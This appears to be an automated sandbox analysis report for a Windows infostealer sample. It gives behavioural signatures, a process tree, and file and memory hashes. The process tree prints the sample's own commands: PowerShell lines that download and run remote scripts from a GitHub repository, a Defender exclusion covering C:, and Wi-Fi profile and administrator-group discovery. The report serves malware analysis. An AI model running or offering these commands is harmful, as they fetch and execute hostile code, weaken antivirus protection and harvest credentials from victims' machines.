Analysis

  • max time kernel
    137s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/08/2024, 21:40

General

  • Target

    2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe

  • Size

    14.0MB

  • MD5

    b57956f6d4ccf57e7c4e327020a456b9

  • SHA1

    e804f692483945d0dc4604a4a1220902d7c55f6b

  • SHA256

    5be6f36014d4b72e8cc036fafe84e49e6d107e84904c87c5f9b5a2faceb1bf9e

  • SHA512

    2c15e0c958020e7e0678262db5a235657559d9ee72ae29aac7660b8759faccad622919e97f1bde4bf4a486394d1ed32484454b046dc06a58029345cda4071929

  • SSDEEP

    98304:NSdnz5ExC+1YVG2JNLDn/wDnEhJf0RTFh1veMcFJqEFnIV0PvrIIKJu4ahDXFNkW:+z5ExCsgcEXhbIV2v14AFmA/NGaX

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Looks for VMWare drivers on disk 2 TTPs 2 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe"
    1⤵
    • Looks for VirtualBox drivers on disk
    • Looks for VMWare drivers on disk
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4020
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1yzrwmzd\1yzrwmzd.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:396
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA846.tmp" "c:\Users\Admin\AppData\Local\Temp\1yzrwmzd\CSCB20828EEEC1F4B9D8FDE9BB0F1F9B54.TMP"
          4⤵
            PID:4008
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:4812
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:956
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:624
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:3588
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:2740
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2624
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:4344
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:3900
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2320
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:3204
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:2036
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:2632
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:3496
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:3092
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:1680
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:1008
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:744
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
                      2⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4400
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\daafce0k\daafce0k.cmdline"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1644
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA78A.tmp" "c:\Users\Admin\AppData\Local\Temp\daafce0k\CSC22DE2C2D21AF43D28226210AF52752.TMP"
                          4⤵
                            PID:2572
                      • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
                        PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1292
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -C "Add-MpPreference -ExclusionPath 'C:'"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2636
                      • C:\Windows\system32\cmd.exe
                        cmd /c rundll32.exe user32.dll,SwapMouseButton
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4272
                        • C:\Windows\system32\rundll32.exe
                          rundll32.exe user32.dll,SwapMouseButton
                          3⤵
                            PID:2008
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c start facebook.com
                          2⤵
                            PID:4280
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
                            2⤵
                            • Views/modifies file attributes
                            PID:4712
                          • C:\Windows\system32\taskkill.exe
                            taskkill /F /IM wallpaper32.exe
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2216
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x510 0x504
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1808

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          23aba7e7ecd37fd9f076dbd4d6e981e2

                          SHA1

                          40150b7db90f125b7b1c7cae65250f3a13a5bbb3

                          SHA256

                          a67ce8b05ec37c76167b8769946b840cee681b0c3a19b8d7c56835ad21221b12

                          SHA512

                          fce8455921832c8960e1aa783091b83fe17aa885b0a86e92d2ada35c76bfc79122d90b0260f6571018d7317ffee0c3bedc7f0bbf4d21a41e77d02e25892d3c9a

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          0789009e381ff689e09144d17087b434

                          SHA1

                          43ecb03b5bf2aedd9a0ef7aad408f32b3ecf2eed

                          SHA256

                          120dcff0b78993813606335996b0ff453a428710a8f2af6700070fb210cacdad

                          SHA512

                          4064b89ef58eab748f0ec6a4ce619b04fb321df90fe32c54ed65e3f02e0116897b066eb41a3586ef8bb513f252b828598196f43e16f3b669d8f11a949b3d65a8

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          961e4d973ca88badfc54a8b861a23778

                          SHA1

                          168b3fd9d920ecc767f2140f1a8ddcb4629e544b

                          SHA256

                          74f9ffbdad95bbbf96f60ff9302fae311edba1cb6fc6fcc75d32bd07996dc579

                          SHA512

                          d0149444ed08697e48342faf323f07f8b88ceff0124b939079530575cffc817a37e01515b5bed4f62fd381539bff7cf74cf57e4d502508d8a2e8ef25253e2122

                        • C:\Users\Admin\AppData\Local\Temp\1yzrwmzd\1yzrwmzd.dll

                          Filesize

                          4KB

                          MD5

                          1519647e17290ba84b7840886ec18889

                          SHA1

                          fbb8266e929598ac8860f5c4c8bd4bf0b57b6c02

                          SHA256

                          212ebe62229b28ee8e6c2aa039f2e44e7aa512133cae1fdf03d8438f01d13ff9

                          SHA512

                          474e02dc3a6bf875e3ffeb956a99e6244ce12604ed890b83095f9f064534cf6c4fcc47dd46cae736c7510c3a737c3d85999efc6fa7eb9bc213a01a343a54b9d1

                        • C:\Users\Admin\AppData\Local\Temp\RESA78A.tmp

                          Filesize

                          1KB

                          MD5

                          0934817aa87fc39c32a7f9f9a14e23e3

                          SHA1

                          343750c3013206ef0a395c67a97219f1f2fcbbb9

                          SHA256

                          0cc37b2a908609f30921d5e06a20ff9179073321d35528426a75efdf48d6cd8e

                          SHA512

                          399803b784aed1938622afd263eef74917b957905dd6dd07e72464dccefb173a7ba9cd282166a8384b9a51f816db30c1ffc77dc76f13e5528ac1baba95864f15

                        • C:\Users\Admin\AppData\Local\Temp\RESA846.tmp

                          Filesize

                          1KB

                          MD5

                          95c84ab1832a340e0872aa6f300abc75

                          SHA1

                          4ca4ca63cfc5d3cc19276bd6412eed8aa2fcdf42

                          SHA256

                          9548c6e84a11144b184a3b0a0d9e5e55ff58e8589b03749ea6ab144bee06ec9d

                          SHA512

                          c368b98281cc926fb5a00676e1682172460f5a448d54d0cd7b0363194a08c8458a06c31b4065edc83ed236c6bc6f595d7f99ce8148d5c806a69621c19622b284

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                          Filesize

                          95KB

                          MD5

                          6db2a6f7ef31d40e0458deb7e2cc87dc

                          SHA1

                          cd6555c9129c98e4b48a750e45c799308ed1602f

                          SHA256

                          e74e6b61d28a6a37fab6ed031ced3c406b7a20707a60b7340caf983a09017655

                          SHA512

                          dfa058d4ae994522d1cd06f53a6e5ffb12dd3e5d05210aeef90aa952f114a39b6f83500a000573398b388a70e7abe762759380f10e9907a9fd01da8f300d8efc

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                          Filesize

                          24KB

                          MD5

                          eea61ca06998f767fbe8ebab1e8722be

                          SHA1

                          7218a6d8721a4e23e701fe06c535e70b2cc3620a

                          SHA256

                          f9d41514957ae515387807f5c45c345e918a83c85dc478d89bd3ef180b500e97

                          SHA512

                          358618df9b8527770a3a687a97409a82e96b40eaa88ccc815d69e74ff63a3a01faa63e6af28c0d7b367441337a508e7b1312967c9d73a4a4dd67fac663123242

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zqgxs1ex.jwa.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\daafce0k\daafce0k.dll

                          Filesize

                          4KB

                          MD5

                          056a7b2f83ee8ed820f45d7cffdd6d82

                          SHA1

                          677620c9c9ca7f53a8046025487cbeeb55cf9543

                          SHA256

                          dba640f969c63f6db66f246f7d323dfd99110820cfed9a5cc2a347968f96f3cf

                          SHA512

                          c511c2d44706d6e8604230ab641342e43169b9b5ca5797235439024b54e3e3ea0f4ce906fda978da8f660bcdeb7264f26f39f37e40d5cc0fc8ba337df38e1555

                        • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                          Filesize

                          2KB

                          MD5

                          9758656bbe8589c66bb241b052490c72

                          SHA1

                          b73da83fb3ae6b86c6365769a04de9845d5c602c

                          SHA256

                          e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                          SHA512

                          da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                        • \??\c:\Users\Admin\AppData\Local\Temp\1yzrwmzd\1yzrwmzd.cmdline

                          Filesize

                          369B

                          MD5

                          dcdfc9c851d01091d47b12923188cd91

                          SHA1

                          6ad9b0177ceed881a19d8f720de9cf124d6b0940

                          SHA256

                          4e97a427337f975c930deb707199723bc3c82865b3f80b4100b3d62918b786ae

                          SHA512

                          9ae35895f3e8f95abd37045ba2021e1355b788a87a0de9da9e2b58a22b325897b1501d673e386293a3c4ed421a568cdf8412abc7ade71dfb35c6b3dad67b0402

                        • \??\c:\Users\Admin\AppData\Local\Temp\1yzrwmzd\CSCB20828EEEC1F4B9D8FDE9BB0F1F9B54.TMP

                          Filesize

                          652B

                          MD5

                          f696daf186f7847a0edfd0ec8a1fb83a

                          SHA1

                          4127e9a1c39562dc44614dcfc1a381307c6d9740

                          SHA256

                          4798605f272b7160841dfb527c786254eba8f5d99e8a9e28f845162bb320a5f6

                          SHA512

                          2434ca865c6b2d58f9ee99252a7a1c2a4dab8afd4c20b8a417fe62934ccd6590e1ed21e66605a03b753b4239439a6681900a79cad1f75e12888551ae1e950fff

                        • \??\c:\Users\Admin\AppData\Local\Temp\daafce0k\CSC22DE2C2D21AF43D28226210AF52752.TMP

                          Filesize

                          652B

                          MD5

                          0154a3df39f3dffdfa66a349de81a1cd

                          SHA1

                          ba167bdd66260d8b192a8cd7151236da7c027246

                          SHA256

                          12a18d0dab187d009a095e4c26ca4beea77372e3bc9558cef0201c1a111b918a

                          SHA512

                          998c1783afedc15026e418760c32ece55806b95983655e99a5900317c5f59a72065a04573bf654470843249a41ff992a1935fe912c2aabda5446b06f7f7109da

                        • \??\c:\Users\Admin\AppData\Local\Temp\daafce0k\daafce0k.0.cs

                          Filesize

                          1KB

                          MD5

                          8a1e7edb2117ec5dde9a07016905923b

                          SHA1

                          0155dbeeb16333e2eaa767b0209750efee56f47f

                          SHA256

                          c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                          SHA512

                          4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                        • \??\c:\Users\Admin\AppData\Local\Temp\daafce0k\daafce0k.cmdline

                          Filesize

                          369B

                          MD5

                          76b50dc28eea1a7bd884659125de9bbe

                          SHA1

                          5dfadb9c38716e713a44443853bf5fb118a9bab9

                          SHA256

                          5e2cf506d09f751aed6e6bcc9cd69224d670791367c5d17498c1eb5ecaed1923

                          SHA512

                          9089a94e0003abc403880aec1f129470ce199275f474ab9b14b46887731704150c38e4b16bb726050faabbe418c08d63d2866e2c44f79d5723549892c54df176

                        • memory/2636-34-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2636-82-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2636-32-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2636-22-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4020-95-0x000001EFA1720000-0x000001EFA174A000-memory.dmp

                          Filesize

                          168KB

                        • memory/4020-128-0x000001EFA1510000-0x000001EFA151A000-memory.dmp

                          Filesize

                          40KB

                        • memory/4020-78-0x000001EF88690000-0x000001EF88698000-memory.dmp

                          Filesize

                          32KB

                        • memory/4020-127-0x000001EFA1720000-0x000001EFA1732000-memory.dmp

                          Filesize

                          72KB

                        • memory/4020-96-0x000001EFA1720000-0x000001EFA1744000-memory.dmp

                          Filesize

                          144KB

                        • memory/4400-84-0x000001C5F8A70000-0x000001C5F9216000-memory.dmp

                          Filesize

                          7.6MB

                        • memory/4400-90-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4400-8-0x000001C5F7DC0000-0x000001C5F7DE2000-memory.dmp

                          Filesize

                          136KB

                        • memory/4400-0-0x00007FFAD8AF3000-0x00007FFAD8AF5000-memory.dmp

                          Filesize

                          8KB

                        • memory/4400-64-0x000001C5F7EF0000-0x000001C5F7EF8000-memory.dmp

                          Filesize

                          32KB

                        • memory/4400-2-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4400-1-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

                          Filesize

                          10.8MB